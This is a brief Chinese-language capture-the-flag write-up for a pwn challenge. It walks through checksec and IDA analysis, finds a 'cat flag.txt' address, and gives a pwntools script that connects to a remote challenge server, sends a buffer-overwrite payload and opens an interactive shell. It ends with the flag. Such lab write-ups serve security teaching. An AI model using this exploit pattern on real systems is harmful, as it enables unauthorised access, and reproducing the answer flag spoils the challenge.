1、下载文件并开启靶机
2、用Linux查看该文件信息
checksec 2
3、该文件是64位的文件,用64位IDA打开该文件
3.1、shift+f12查看该文件关键字符串
3.2、双击关键字符串,再按ctrl+x查看"cat flag.txt"的地址
"cat flag.txt"地址:0x400686
3.3、按f5进入main函数
两个函数相差4个字节
4、编译代码
#encoding=utf-8
from pwn import * #导入pwntools中pwn的所有内容
p = remote("111.200.241.244",51608) #链接服务器远程交互
p.sendline(b'a'*4+b'aaun') #覆盖地址
p.interactive() #反弹shell进行交互
5、flag为:
cyberpeace{95a4f64051312552b152a0c8d40280c8}